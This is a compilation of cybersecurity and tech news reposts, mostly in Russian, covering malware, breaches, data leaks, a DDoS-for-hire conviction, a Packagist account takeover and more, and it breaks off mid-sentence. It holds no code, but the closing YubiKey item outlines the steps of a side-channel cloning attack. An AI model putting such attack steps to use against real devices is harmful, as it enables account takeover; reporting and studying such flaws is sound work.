По словам нескольких нынешних и бывших сотрудников Yahoo, которые беседовали с TechCrunch на условиях анонимности, с начала 2024 года компания уволила или потеряла в результате истощения от 40 до 50 человек из 200 сотрудников команды кибербезопасности. (Yahoo является материнской компанией TechCrunch).
Paranoids - не единственная команда, которую затронули увольнения. Валерий Либорски, назначенный в сентябре на должность директора по технологиям (CTO) Yahoo, на этой неделе разослал сотрудникам письмо, в котором сообщил об изменениях в технологическом подразделении, включая корпоративную производительность и основные сервисы. В электронном письме, полученном TechCrunch, говорится следующее: «Это было очень трудное решение, и я не принял его легкомысленно».
На этой неделе была полностью ликвидирована «red team» Paranoids, также известная как команда наступательной безопасности, которая проводит симуляции кибератак, чтобы выявить слабые места в сети компании до того, как это сделают внешние хакеры, и, по словам источников, в этом году было как минимум три раунда увольнений, затронувших команду кибербезопасности.
Yahoo подтвердила факт увольнений, включая ликвидацию «red team», когда с ней связался TechCrunch в четверг.
«За последние семь лет программа безопасности Yahoo значительно выросла и получила широкое признание как ведущая в отрасли операция мирового класса. В рамках этой эволюции мы внесли стратегические коррективы, в том числе перевели наступательные операции по безопасности на аутсорсинговую модель», - сказал представитель Yahoo Бренден Ли (Brenden Lee). «Это изменение отражает сложность нашей программы и позволяет нам сконцентрировать ресурсы на важнейших приоритетах безопасности, поддерживая высочайшие стандарты защиты наших пользователей и платформ».
В прошлом году компания в целом уволила более 1600 сотрудников - около 20% от общего числа персонала, о чем в свое время сообщило издание Axios. Главный исполнительный директор Yahoo Джим Ланзоне сказал Axios, что увольнения будут «чрезвычайно полезны для прибыльности Yahoo в целом» и что компания «перейдет в наступление» и будет инвестировать в другие части своего бизнеса.
source: [https://techcrunch.com/2024/12/12/y...ayoffs-outsourcing-of-red-team- under-new-cto/](https://techcrunch.com/2024/12/12/yahoo-cybersecurity-team- sees-layoffs-outsourcing-of-red-team-under-new-cto/)
Пострадавшая вдова обнаружила списания спустя полгода после смерти мужа.
Житель Москвы Анатолий скончался весной 2024 года. Однако только спустя полгода его вдова обнаружила, что с банковского счета мужа было списано 1 271 700 рублей.
Как выяснилось, преступники восстановили eSIM-карту Анатолия и получили доступ к его счету. Злоумышленники смогли каким-то образом получить данные паспорта умершего, после чего пришли в салон связи на «Бауманской» и оформили дубликат SIM-карты. С помощью этой симки им удалось снять все деньги с банковского счета.
Родные Анатолия узнали об этом инциденте только спустя полгода, когда вдова заглянула на счет мужа и обнаружила пропажу крупной суммы. После получения банковских выписок выяснилось, что неизвестные получили доступ к счету всего через неделю после смерти владельца.
Эксперты настоятельно рекомендуют: при любых изменениях, связанных с вашим мобильным номером (смена, утеря, прекращение использования), необходимо незамедлительно отвязать его от:
Портала Госуслуг
Банковских приложений
Социальных сетей
Электронной почты
Других сервисов, использующих телефонный номер для аутентификации
Особое внимание следует уделить этому вопросу в случае смерти близких родственников. Необходимо оперативно отключить их номера от всех цифровых сервисов во избежание подобных мошеннических действий.
t.me/bazabazon/32644
A small but complex malware variant is targeting supercomputers worldwide.
Reverse engineered by ESET and described [in a blog
post](https://www.welivesecurity.com/2021/02/02/kobalos-complex-linux-threat-
high-performance-computing-infrastructure/) on Tuesday, the malware has been
traced back to attacks against supercomputers used by a large Asian Internet
Service Provider (ISP), a US endpoint security vendor, and a number of
privately-held servers, among other targets.
The cybersecurity team has named the malware Kobalos in deference to the [kobalos](https://baringtheaegis.blogspot.com/2016/01/the-kobaloi-original- kobolts.html), a small creature in Greek mythology believed to cause mischief.
Kobalos is unusual for a number of reasons. The malware's codebase is tiny but is sophisticated enough to impact at least Linux, BSD, and Solaris operating systems. ESET suspects it may possibly be compatible with attacks against AIX and Microsoft Windows machines, too.
"It has to be said that this level of sophistication is only rarely seen in Linux malware," commented cybersecurity researcher Marc-Etienne Léveillé.
While working with the CERN Computer Security Team, ESET realized the "unique, multiplatform" malware was targeting high performance computer (HPC) clusters. In some cases of infection, it appears that 'sidekick' malware hijacks SSH server connections to steal credentials that are then used to obtain access to HPC clusters and deploy Kobalos.
"The presence of this credential stealer may partially answer how Kobalos
propagates," the team says.
Kobalos is, in essence, a backdoor. Once the malware has landed on a
supercomputer, the code buries itself in an OpenSSH server executable and will
trigger the backdoor if a call is made through a specific TCP source port.
Other variants act as middlemen for traditional command-and-control (C2) server connections.
Kobalos grants its operators remote access to file systems, allows them to spawn terminal sessions, and also acts as connection points to other servers infected with the malware.
ESET says that a unique facet of Kobalos is its ability to turn any compromised server into a C2 through a single command.
"As the C2 server IP addresses and ports are hardcoded into the executable, the operators can then generate new Kobalos samples that use this new C2 server," the researchers noted.
The malware was a challenge to analyze as all of its code is held in a "single function that recursively calls itself to perform subtasks," ESET says, adding that all strings are encrypted as a further barrier to reverse engineering. As of now, more research needs to be conducted in the malware -- and who may be responsible for its development.
"We were unable to determine the intentions of the operators of Kobalos," ESET commented. "No other malware, except for the SSH credential stealer, was found by the system administrators of the compromised machines. Hopefully, the details we reveal today in our new publication will help raise awareness around this threat and put its activity under the microscope."
Череда исправления проблем в Google Chrome продолжается. На этот раз в браузере Google устранили серьезный баг, связанный с работой JavaScript-движка V8.
Об уязвимости, получившей идентификатор CVE-2021-21227 и имеющей высокую степень серьезности, сообщил исследователь китайской ИБ-компании Singular Security Lab. Известно, что исследователь заработал за этой проблеме 15 000 долларов по программе bug bounty.
Разработчики Google охарактеризовали найденный баг как «недостаточную валидацию данных в V8». Уязвимость может использоваться для удаленного выполнения кода в браузере жертвы, однако она, равно как и другие недавно обнаруженные баги в V8, не позволяет сбежать из песочницы Chrome. То есть, чтобы полноценно использовать CVE-2021-21227 для атак, ее нужно будет скомбинировать с другой проблемой безопасности.
Исследователь пишет, что уязвимость CVE-2021-21227 связана с багами CVE-2020-16040 и CVE-2020-15965, тоже найденными в коде V8, которые инженеры Google исправили в Chrome в декабре и сентябре 2020 года. Так, эксперт обнаружил проблему CVE-2021-21227, анализируя патчи для двух других уязвимостей. По его словам, все эти ошибки были связаны с одной и той же функцией.
Также в версии Chrome 90.0.4430.93, выпущенной на этой неделе, были исправлены еще девять уязвимостей, в том числе пара высокой степени серьезности, три средних и одна с низким уровнем опасности.
Источник: xakep.ru/2021/04/28/one-more-v8-bug/
Злоумышленники скомпрометировали сеть с помощью украденных учетных данных для аккаунта в Umoja.
Хакеры взломали компьютерную сеть Организации Объединенных Наций и похитили информацию, которая может быть использована для атак на ведомства в составе ООН.
По данным Bloomberg, злоумышленники скомпрометировали сеть с помощью украденных учетных данных для аккаунта в Umoja — проприетарной системе ООН для управления ресурсами. Воспользовавшись учетной записью, хакеры проникли глубже в сеть ООН, сообщили специалисты компании Resecurity. Злоумышленники находились в сети в период с 5 апреля по 7 августа, собирая информацию о компьютерных системах ООН для, как предполагается, дальнейшего шпионажа.
Специалисты Resecurity уведомили ООН о взломе ранее в этом году. Как утверждали представители ООН, взлом был ограничен только разведкой и, находясь в сети, хакеры просто делали скриншоты. Когда Resecurity предоставила свидетельства кражи данных, организация прервала контакт с компанией.
Скомпрометированный аккаунт Umoja не был защищен двухфакторной
аутентификацией. Как полагают эксперты, хакеры приобрели учетные данные для
аккаунта в даркнете.
Источник: securitylab.ru
https://www.bleepingcomputer[.]com/...ictims-quietly-helped-using-secret- decryptor/

](https://blog.emsisoft.com/en/39181/on-the-matter-of-blackmatter/)
A bug in BlackMatter's encryption enabled us to help victims recover their data and avoiding tens of millions of dollars in ransom demands.
 blog.emsisoft.com
A secret BlackMatter decryptor
Soon after the BlackMatter ransomware operation launched, Emsisoft discovered
a flaw allowing them to create a decryptor recover victim's files without
paying a ransom.
Emsisoft immediately alerted law enforcement, ransomware negotiations firms,
incident response firms, CERTS worldwide, and trusted partners with
information about the decryptor.
This allowed these trusted parties to refer BlackMatter victims to Emsisoft to
recover their files rather than pay a ransom.
"Since then, we have been busy helping BlackMatter victims recover their data.
With the help of law enforcement agencies, CERTs and private sector partners
in multiple countries, we were able to reach numerous victims, helping them
avoid tens of millions of dollars in demands," explains Wosar in a blog post
about the BlackMatter decryptor.
Other than referrals, Emsisoft was also contacting victims found through
BlackMatter samples and ransom notes publicly uploaded to various sites.
When a BlackMatter samples becomes public, it was possible to extract the
ransom note and gain access to the negotiations between the victim and the
ransomware gang. After identifying the victim, Emsisoft would privately
contact them about the decryptor so they they did not have to pay the ransom.
If Emsisoft could find the ransomware samples and notes, though, other people
could as well and have used them to hijack negotiation chats or shared images
of the chats on Twitter.
This ultimately led to BlackMatter locking down their negotiation site so that
only the victims could gain access, making it impossible for researchers to
find victims this way.
тишком декриптили значит-ся -> XD
BlackMatter - RIP или че?
Original link - https://www.bleepingcomputer[.]com/...-excel-40-macros-by- default-to-block-malware/
Microsoft has announced that Excel 4.0 (XLM) macros will now be disabled by default to protect customers from malicious documents.
In October, the company first revealed in a Microsoft 365 message center update that it would disable XLM macros in all tenants if the users or admins hadn't manually toggled the feature on or off.
[Starting July 2021](https://techcommunity.microsoft.com/t5/excel- blog/restrict-usage-of-excel-4-0-xlm-macros-with-new-macro- settings/ba-p/2528450), Windows admins could also use group policies and users the 'Enable XLM macros when VBA macros are enabled' setting from the Excel Trust Center to disable this feature manually.
"In July of 2021, we released a new Excel Trust Center setting option to restrict the usage of Excel 4.0 (XLM) macros," [said](https://techcommunity.microsoft.com/t5/excel-blog/excel-4-0-xlm-macros- now-restricted-by-default-for-customer/ba-p/3057905) Catherine Pidgeon, a Principal Program Manager Lead at Microsoft, earlier this week in a Tech Community blog post.
"As planned, we have now made this setting the default when opening Excel 4.0 (XLM) macros. This will help our customers protect themselves against related security threats."
Admins can configure how Excel macros are allowed to run using Group Policy settings, Cloud policies, and ADMX policies.
They can also block all Excel XLM macro use in their environments (including new user-created files) by toggling on the "Prevent Excel from running XLM macros" Group Policy, configurable via Group Policy Editor or registry key.
Right now, XLM macros are disabled by default in the September fork, Excel version 16.0.14527.20000 and newer available in the:
XLS document with
obfuscated Excel 4.0 macro
[XLM (aka Excel 4.0) macros](https://support.microsoft.com/en-
us/office/working-with-excel-4-0-macros-ba8924d4-e157-4bb2-8d76-2c07ff02e0b8)
were the default Excel macro format until Excel 5.0 was released in
1993 when Microsoft first introduced
[VBA macros](https://support.microsoft.com/en-us/office/automate-tasks-with-
the-macro-recorder-974ef220-f716-4e01-b015-3ea70e64937b) which are still the
default format.
However, despite being discontinued, threat actors are still using XLM three decades later to create documents that deploy malware or perform other malicious behavior manipulating files on the local filesystem because current Microsoft Office versions still come with support for XLM macros.
Malicious campaigns using this type of macros to push malware have been observed downloading and installing TrickBot, Zloader, Qbot, Dridex, and many other strains on victims' computers.
Microsoft also silently added a Group Policy in October 2019 that allows admins to block Excel users from opening untrusted (and potentially malicious) Microsoft Query files with IQY, OQY, DQY, and RQY extensions.
Such files have been weaponized in numerous malicious attacks to deliver remote access Trojans and malware loaders since early 2018.
Целями атак становились дома, школы, университеты, органы власти и финансовые
учреждения по всему миру.
В конце девятидневного судебного разбирательства суд Калифорнии признал
виновным администратора двух сервисов по осуществлению атак типа
распределенного отказа в обслуживании (DDoS).
32-летний Мэтью Гатрел (Matthew Gatrel) из Сент-Чарльза, штат Иллинойс, управлял двумя web-сайтами, позволившим платным подписчикам провести в общей сложности более 200 тыс. DDoS-атак на жертв в частном и в государственном секторе.
Согласно судебным документам, Гатрел управлял DDoS-сервисами по крайней мере с октября 2014 года. Под его управлением было два сайта (DownThem и Ampnode), которые позволяли выполнять DDoS-атаки.
Гатрел использовал DownThem для продажи подписок на свои DDoS-сервисы (также называемые booters или stressers), а AmpNode предлагал «пуленепробиваемые» варианты серверного хостинга клиентам, которым требовались предварительно настроенные серверы со скриптами для DDoS-атак.
По словам специалистов, у web-сайта DownThem было более 2 тыс. зарегистрированных клиентов, ответственных за запуск в общей сложности более чем 200 тыс. DDoS-атак. Целями атак становились дома, школы, университеты, web-сайты муниципальных и местных органов власти и финансовых учреждений по всему миру.
Клиенты могли выбирать из нескольких подписок, каждая из которых имела различные возможности атаки, такие как продолжительность, сила или возможность одновременных атак. Выбрав цель, сервис использовал серверы AmpNode для запуска «атак с отраженным усилением» с использованием ресурсов «сотен или тысяч других серверов, подключенных к интернету».
В администрировании web-сайта DownThem Гатрелу в 2018 году помогал 28-летний Хуан Мартинес (Juan Martinez) из Пасадены. В отличие от Гатрела, Мартинес уже признал себя виновным и ожидает приговора, назначенного на 2 декабря. Ему грозит максимальное наказание в виде 10 лет лишения свободы. Гатрелу грозит максимальное наказание в виде 35 лет лишения свободы за три преступления, в которых он был признан виновным: один эпизод сговора с целью совершения несанкционированного повреждения защищенного компьютера, один эпизод сговора с целью мошенничества с использованием электронных средств и один эпизод несанкционированного вывода из строя защищенного компьютера.
Оглашение приговора Гатрелу назначено на 27 января 2022 года.
Подробнее: https://www.securitylab.ru/news/524624.php
Администраторы репозитория пакетов Packagist раскрыли сведения об атаке, в результате которой был захвачен контроль над учётными записями сопровождающих 14 PHP-библиотек, в числе которых такие популярные пакеты, как instantiator (526 млн установок всего, 8 млн установок за месяц, 323 зависимых пакета), sql-formatter (94 млн установок всего, 800 тысяч за месяц, 109 зависимых пакетов), doctrine-cache-bundle (73 млн установок всего, 500 тысяч за месяц, 348 зависимых пакетов) и rcode-detector-decoder (20 млн установок всего, 400 тысяч за месяц, 66 зависимых пакетов).
После компрометации учётных записей атакующий изменил файл composer.json, добавив в поле с описанием проекта информацию том, что он ищет работу, связанную с информационной безопасностью. Для внесения изменения в файл composer.json атакующий заменил URL оригинальных репозиториев ссылками на модифицированные форки (в Packagist предоставляются только метаданные со ссылками на проекты, развиваемые на GitHub, при выполнении установки командой "composer install" или "composer update" пакеты загружаются напрямую с GitHub). Например, для пакета acmephp привязанный репозиторий был заменён с acmephp/acmephp на neskafe3v1/acmephp.
Судя по всему атака была произведена не для совершения вредоносных действий, а в качестве демонстрации недопустимости беспечного отношения к использованию повторяющихся учётных данных на разных сайтах. При этом атакующий вопреки сложившейся практике "этических взломов" заранее не уведомил разработчиков библиотек и администраторов репозитория о проводимом эксперименте. Позднее атакующий сообщил, что после того как ему удастся получить работу он опубликует детальный отчёт об использованных в атаке методах.
По опубликованным администраторами Packagist данным, во всех учётных записях, управлявших скомпрометированными пакетами, использовались простые для подбора пароли без включения двухфакторной аутентификации. Утверждается, что во взломанных учётных записях использовались пароли, применявшиеся не только в Packagist, но и в других сервисах, базы паролей которых были ранее скомпрометированы и попали в публичный доступ. Как вариант получения доступа также мог использоваться захват email владельцев учётных записей, которые были привязаны к просроченным доменам.
Скомпрометированные пакеты:
acmephp/acmephp (124,860 установок за всё время существования пакета)
acmephp/core (419,258)
acmephp/ssl (531,692)
doctrine/doctrine-cache-bundle (73,490,057)
doctrine/doctrine-module (5,516,721)
doctrine/doctrine-mongo-odm-module (516,441)
doctrine/doctrine-orm-module (5,103,306)
doctrine/instantiator (526,809,061)
growthbook/growthbook (97,568
jdorn/file-system-cache (32,660)
jdorn/sql-formatter (94,593,846)
khanamiryan/qrcode-detector-decoder (20,421,500)
object-calisthenics/phpcs-calisthenics-rules (2,196,380)
tga/simhash-php, tgalopin/simhashphp (30,555)
киберэксперт
Тот же автор ранее выложил базу, якобы украденную из госпортала "Дія". Сейчас
она отмечена как проданная.
Хакер опубликовал новых данные, полученных в результате хакерской атаки на
государственные сайты Украины в ночь с 13 на 14 января. Об этом специалист по
кибербезопасности Кир Важницкий написал на своей странице в Facebook 12
февраля.
По его словам, хакер разместил на сайте в даркнете два новых файла, подписанные db_wanted и health.mia. Первый весит 3,5 ГБ и содержит копию MySQL-базы публичного реестра розыска — данные, которые содержатся на сайте МВД в открытом доступе.
"IT-специалистам смотреть категорически противопоказано, потому что там адок и диджитализация уровня 90-х годов. Другим не интересно. Я проверил, ничего намеренно не добавлено. А вот МВД обновлять реестр могли бы и более регулярно", — прокомментировал эксперт.
Второй же файл содержит 100 ГБ "чувствительной медицинской информации", в том числе конфиденциальные данные о пациентах, процедурах, результатах анализов. Большинство записей датируются 2019-2021 годами. Структура ссылок в базе пуш- сообщений с домена health.mia.software указывает на то, что данные были слиты из Департамента здравоохранения и реабилитации МВД.
"Это не "база ЭСЗО" (Электронная система здравоохранения — ред.), как некоторые начали утверждать. Это три базы postgresql и две mongodb МИС-систем "Медстар" с модулями idis2go и обмена данными с ЭСЗО", — подчеркнул Кир Важницкий. — "Что с этим делать? Наверное, ничего. Большинство пострадавших – люди из системы МВД. У них есть Киберполиция. Пусть разбираются сами".
Примечательно, что файлы разместил пользователь с ником FreeCivilian, который ранее опубликовал фрагменты персональных данных украинцев, якобы украденные из государственного портала "Дія" и "Кабинета водителя". Сейчас эта база объемом 765 ГБ отмечена, как проданная. Тем не менее, новые "дампы" опубликованы полностью.
"Это подтверждает отсутствие коммерческих мотивов и намекает на не очень удачную попытку продолжения активного мероприятия", — предположил Кир Важницкий в своем посте.
Ранее стало известно, что пользователь FreeCivilian выставил на продажу данные украинцев за $15 тысяч. База содержит имена, фамилии, отчества, даты рождения, номера телефонов, идентификационные коды, паспортные данные. Для предпросмотра автор разместил три архива объемом более 11,4 ГБ.
Позже эксперт по кибербезопасности Андрей Баранович сообщил, что "слитые" данные являются подлинными и свежими. Он проанализировал записи и обнаружил в них элементы, схожие с превью документов в "Дії", которые практически невозможно подделать.
Украинский программист нашел в "слитой" базе данны 14-летнего родственника. Семья утверждает, что молодой человек получил паспорт только в 2021 году и пользовался только приложением "Дія".
Meta, родитель Facebook, Instagram и WhatsApp, занимает второе место в мире по количеству пользователей интернета. На долю ее сайтов и миллиардов их пользователей приходится 10 % всего стационарного и 22 % всего мобильного трафика. Инвестиции Meta в искусственный интеллект могут еще больше увеличить этот показатель. Поэтому, чтобы обеспечить надежную инфраструктуру для поддержки этого бизнеса, Meta берет трубы в свои руки.
TechCrunch узнал из источников, близких к компании, что Meta планирует построить новый крупный волоконно-оптический подводный кабель по всему миру - проект протяженностью 40 000+ километров, инвестиции в который могут превысить 10 миллиардов долларов. Очень важно, что Meta будет единственным владельцем и пользователем этого подводного кабеля - впервые для компании и, таким образом, представляет собой важную веху в ее инфраструктурных усилиях.
Сунил Тагаре, эксперт по подводным кабелям (и пионер в этой области,
основатель Flag Telecom), который первым сообщил о планах Meta еще в октябре,
рассказал TechCrunch, что планируется начать с бюджета в 2 миллиарда долларов,
но по мере развития проекта эта цифра, вероятно, увеличится до более чем 10
миллиардов долларов, поскольку проект растянется на годы.
Источники, близкие к Meta, подтвердили проект, но сказали, что он все еще
находится на ранней стадии. Планы уже разработаны, но физические активы - нет,
и они отказались обсуждать бюджет. Ожидается, что Meta расскажет об этом более
публично в начале 2025 года, когда подтвердит планы по кабелю, включая
предполагаемый маршрут, пропускную способность и некоторые причины,
побуждающие к его строительству.
Если стратегия будет реализована, то пройдут годы, прежде чем он заработает в полную силу, учитывая, что у ограниченного числа компаний, таких как SubCom, способных создать инфраструктуру, уже есть крупные клиенты, например Google, которые резервируют свои услуги.
"Предложение на кабельных судах очень ограничено", - говорит Ранульф Скарборо, аналитик подводной кабельной индустрии. В данный момент они дороги и забронированы на несколько лет вперед". Найти свободные ресурсы, чтобы сделать это в ближайшее время, - сложная задача". По его словам, одним из вероятных сценариев может стать строительство по частям.
После завершения строительства кабель даст компании Meta выделенную трубу для
передачи данных по всему миру. По словам источников, в настоящее время
планируемый маршрут кабеля пролегает от восточного побережья США до Индии
через Южную Африку, а затем от Индии через Австралию до западного побережья
США, образуя форму буквы "W" вокруг земного шара, как это показано на рисунке
Тагаре:
За работой Meta в области инфраструктуры следит Сантош Джанардхан, который
является главой глобальной инфраструктуры и одним из руководителей инженерного
отдела компании. У компании есть команды по всему миру, которые изучают и
планируют ее инфраструктуру, и в прошлом на нее работали некоторые
значительные фигуры в индустрии. По словам источников, в случае с этим
предстоящим проектом он разрабатывается в подразделении компании в Южной
Африке.
Волоконно-оптические подводные кабели являются частью коммуникационной инфраструктуры на протяжении последних 40 лет. Важно то, кто и для каких целей вкладывает деньги в строительство и владение ими.
Планы Meta подчеркивают, что в последние годы инвестиции и владение подводными сетями перешли от консорциумов с участием операторов связи к крупным технологическим гигантам.
Meta - не новичок в подводной игре. По данным телеком-аналитиков Telegeography, Meta является совладельцем 16 существующих сетей, включая недавний кабель 2Africa, опоясывающий континент (в проекте участвуют такие операторы, как Orange, Vodafone, China Mobile, Bayobab/MTN и другие).
Однако этот новый кабельный проект станет первым, полностью принадлежащим самой компании Meta.
Это ставит Meta в одну категорию с Google, которая участвует примерно в 33 различных маршрутах, включая несколько региональных проектов, в которых она является единственным владельцем, согласно данным Telegeography. Среди других крупных технологических компаний, которые являются либо совладельцами, либо покупателями мощностей в подводных кабелях, - Amazon и Microsoft (ни одна из них не является полным владельцем какого-либо маршрута).
Почему Мета хочет иметь собственный кабель?
Существует ряд причин, по которым строительство подводных кабелей может
заинтересовать такие крупные технологические компании, как Meta.
Meta, как и Google, также превозносит подъем, который она обеспечила регионам благодаря своим подводным инвестициям, утверждая, что такие проекты, как Marea в Европе и другие в Юго-Восточной Азии, принесли более "полутриллиона долларов" в экономику этих регионов.
Однако есть и более прагматичный стимул для этих инвестиций: технологические компании - а не операторы связи, традиционные строители и владельцы этих кабелей - хотят иметь более непосредственное право собственности на трубы, необходимые для доставки контента, рекламы и прочего пользователям по всему миру.
Согласно отчетам о прибылях, Meta зарабатывает больше денег за пределами Северной Америки, чем на своем родном рынке. Приоритет на выделенные подводные кабели поможет обеспечить качество обслуживания этого трафика. (Примечание: речь идет только об обеспечении дальнего трафика: компании все еще приходится вести переговоры с операторами внутри стран и о доставке "последней мили" на устройства пользователей, что может иметь свои сложности).
"Они зарабатывают на том, что их продукты предоставляются конечным пользователям, и они сделают все возможное, чтобы обеспечить удобство для клиентов, будь то доставка видео или других активов", - говорит аналитик Скарборо. "Откровенно говоря, кто будет больше полагаться на традиционных операторов связи? Технологические компании теперь независимы. Они поняли, что должны строить все сами".
Второй - геополитический.
За последние годы несколько раз подводные кабели выводились из строя в качестве сопутствующего или прямого ущерба в результате военных действий. Боевики Хути, поддерживаемые Ираном, нападают на лодки и в процессе повреждают кабели в Красном море (например, этот, соединяющий Европу с Индией). В этом месяце Россию заподозрили в перерезании подводного кабеля в Балтийском море. На этой неделе еще один кабель вышел из строя в европейских водах, и вину за это взяло на себя китайское судно.
Маршрут, предусмотренный Meta, должен помочь компании "избежать зон геополитической напряженности", сообщил TechCrunch источник, близкий к компании.
В своем блоге Тагаре отмечает, что маршрут будет проходить в обход Красного и Южно-Китайского морей, Египта, Марселя, Малаккского пролива и Сингапура - "все они сейчас являются основными точками отказа".
Объявление FCC в этом месяце о том, что она планирует пересмотреть лицензирование подводных кабелей впервые за несколько десятилетий, отчасти из- за национальной безопасности и права собственности на кабели, потенциально может стать еще одним толчком к развитию: Meta станет единственным владельцем маршрута через безопасные коридоры.
source: [https://techcrunch.com/2024/11/29/m...-subsea-cable-spanning-the- world-sources-say/](https://techcrunch.com/2024/11/29/meta-plans-to- build-a-10b-subsea-cable-spanning-the-world-sources-say/)
В Африке прошла операция Operation Serengeti, в рамках которой правоохранительные органы 19 стран арестовали более 1000 человек, подозреваемых в киберпреступлениях, которые нанесли ущерб почти на $193 млн по всему миру.
Операция проходила под координацией Интерпола и Африпола со 2 сентября по 31 октября. Основное внимание уделялось преступлениям, связанным с программами- вымогателями, BEC-атаками, шантажом и интернет-аферами.
По данным Интерпола, арестовано 1006 подозреваемых, а также ликвидировано более 134 000 вредоносных инфраструктур и сетей. Расследование установило связь подозреваемых и вредоносных сетей с 35 224 жертвами, потерявшими в общей сложности $193 млн. В ходе операции удалось вернуть около $44 млн.
Региональные достижения операции
• Кения: Выявлено мошенничество с кредитными картами, в результате которого было похищено $8,6 млн. Средства переводились через SWIFT на счета компаний в ОАЭ, Нигерии и Китае. Арестованы почти 20 человек.
• Сенегал: Раскрыта финансовая пирамида, в рамках которой 1811 человек потеряли $6 млн. Изъято более 900 SIM-карт, $11 000 наличными, а также телефоны, ноутбуки и удостоверения жертв. Задержаны 8 человек, включая 5 граждан Китая.
• Нигерия: Арестован организатор инвестиционных мошенничеств, обманувший клиентов на $300 000 с помощью ложных обещаний по криптовалютам.
• Камерун: Пресечена многоуровневая маркетинговая афера, жертвами которой стали жители 7 стран. Людей удерживали насильно, требуя привлекать новых участников, чтобы самим выйти на свободу. Мошенники собрали не менее $150 000 в виде членских взносов.
• Ангола: Ликвидирована международная группа, управлявшая виртуальным казино в Луанде. Сотни пострадавших были вовлечены в схему с обещанием вознаграждений за привлечение новых участников. Арестовано 150 человек, изъято 200 компьютеров и более 100 мобильных телефонов.
Операция Serengeti финансировалась МИД Великобритании и Германии, а также Советом Европы. В числе стран-участниц — Алжир, Ангола, Бенин, Габон, Гана, Кения, Мозамбик, Нигерия, Сенегал, Танзания и другие. Партнёрами выступили такие компании, как Fortinet, Group-IB, Kaspersky, Trend Micro и Team Cymru.
• Source: https://www.interpol[.]int/en/News-and-Events/News/2024/Major- cybercrime-operation-nets-1-006-suspects
Исследователи безопасности обнаружили криптографическую ошибка, которая делает YubiKey 5 уязвимым для атак.
YubiKey 5, наиболее широко используемый аппаратный токен для двухфакторной аутентификации на основе стандарта FIDO, содержит криптографическую ошибку, которая делает устройство размером с палец уязвимым для клонирования, когда злоумышленник получает к нему временный физический доступ, сообщили исследователи [Ars Technica](https://arstechnica.com/security/2024/09/yubikeys-are-vulnerable-to- cloning-attacks-thanks-to-newly-discovered-side-channel/).
Криптографическая ошибка, известная как побочный канал ("side channel"), содержится в небольшом микроконтроллере, используемом в большом количестве других устройств аутентификации, включая смарт-карты, используемые в банковской сфере, электронные паспорта и доступ в безопасные зоны. Хотя исследователи подтвердили, что все модели YubiKey серии 5 могут быть клонированы, они не проверяли другие устройства, использующие этот микроконтроллер, такие как SLE78 производства Infineon и последующие микроконтроллеры, известные как Infineon Optiga Trust M и Infineon Optiga TPM. Исследователи подозревают, что любое устройство, использующее любой из этих трех микроконтроллеров и криптографическую библиотеку Infineon, содержит ту же самую уязвимость.
Patching Not Possible
Производитель ключей YubiKey компания Yubico выпустила
[предупреждение](https://www.yubico.com/support/security-
advisories/ysa-2024-03/) в связи с подробным [отчетом о раскрытии информации
от NinjaLab](https://ninjalab.io/wp-
content/uploads/2024/09/20240903_eucleak.pdf), компании, которая провела
реверс-инжиниринг ключей серии YubiKey 5 и разработала атаку на клонирование.
Уязвимыми являются все ключи YubiKeys с прошивкой до версии 5.7, которая была
выпущена в мае и заменяет криптобиблиотеку Infineon на собственную. Обновить
прошивку ключей YubiKey невозможно. Таким образом, все пострадавшие YubiKey
остаются уязвимыми навсегда.
«Злоумышленник может использовать эту проблему в рамках сложной и целенаправленной атаки для восстановления затронутых закрытых ключей ("private keys")», - подтверждается в сообщении. «Злоумышленнику потребуется физическое владение YubiKey, ключом безопасности или YubiHSM, знание учетных записей, которые он хочет атаковать, и специальное оборудование для проведения необходимой атаки. В зависимости от случая использования злоумышленнику могут потребоваться дополнительные сведения, включая имя пользователя, PIN-код, пароль учетной записи или ключ аутентификации».
Побочные каналы - это результат подсказок, оставленных в физических проявлениях, таких как электромагнитные излучения, кэши данных или время, необходимое для выполнения задачи, в результате которой происходит утечка криптографических секретов. В данном случае побочным каналом является время, затрачиваемое на математическое вычисление, известное как модульная инверсия. В криптобиблиотеке Infineon не была реализована распространенная защита от побочных каналов, известная как постоянное время, при выполнении операций модульной инверсии, связанных с Elliptic Curve Digital Signature Algorithm. Постоянная времени обеспечивает равномерное, а не переменное в зависимости от конкретных ключей выполнение криптографических операций, чувствительных ко времени.
Если конкретней, побочный канал находится в реализации Infineon расширенного евклидова алгоритма ("Extended Euclidean Algorithm"), метода, позволяющего, в частности, вычислять модульную обратную величину. Используя осциллограф для измерения электромагнитного излучения во время аутентификации токена, исследователи могут обнаружить крошечные различия во времени выполнения, которые раскрывают эфемерный ключ ECDSA токена, также известный как nonce. Дальнейший анализ позволяет исследователям извлечь секретный ключ ECDSA, который лежит в основе всей безопасности токена.
Как сообщают NinjaLab, для атаки требуется оборудование стоимостью около $11,000 и сложное понимание электрической и криптографической техники. Сложность атаки означает, что она, скорее всего, может быть осуществлена только национальными государствами или другими организациями, обладающими сопоставимыми ресурсами, и то только в строго целевых сценариях. Вероятность того, что такая атака будет широко использоваться в природе, крайне мала. По словам основателя компании NinjaLab, функции двухфакторной аутентификации и одноразовых паролей не затронуты, поскольку они не используют уязвимую часть library.ur.
В целом, ход атаки клонирования выглядит следующим образом:
1. Атакующий крадет логин и пароль учетной записи приложения жертвы,
защищенной FIDO (например, с помощью фишинговой атаки).
2. Атакующий получает физический доступ к устройству жертвы в течение
ограниченного периода времени так, чтобы жертва этого не заметила.
3. Благодаря украденным логину и паролю жертвы (для данной учетной записи
приложения) атакующий отправляет запрос аутентификации на устройство столько
раз, сколько необходимо, выполняя при этом измерения по побочным каналам.
4. Атакующий незаметно возвращает FIDO-устройство жертве.
5. Атакующий выполняет атаку по побочным каналам на измерения и добивается
успеха в извлечении закрытого ключа ECDSA, связанного с учетной записью
приложения жертвы.
6. Атакующий может войти в учетную запись приложения жертвы без устройства
FIDO и незаметно для жертвы. Другими словами, противник создал клон устройства
FIDO для учетной записи приложения жертвы. Этот клон будет предоставлять
доступ к учетной записи приложения до тех пор, пока легитимный пользователь не
отзовет свои учетные данные для аутентификации.
В данном списке, однако, отсутствует ключевой шаг - разборка YubiKey и обнажение логической платы, находящейся внутри. Вероятно, для этого нужно использовать пистолет с горячим воздухом и скальпель, чтобы снять пластиковый корпус ключа и обнажить часть логической платы, которая служит защитным элементом, хранящим криптографические секреты. После этого злоумышленник подключает чип к программному и аппаратному обеспечению, которое проводит измерения, пока ключ используется для аутентификации существующего аккаунта. По окончании измерений злоумышленник запечатывает чип в новый корпус и возвращает его жертве.
В YubiKeys правда предусмотрены дополнительные средства аутентификации
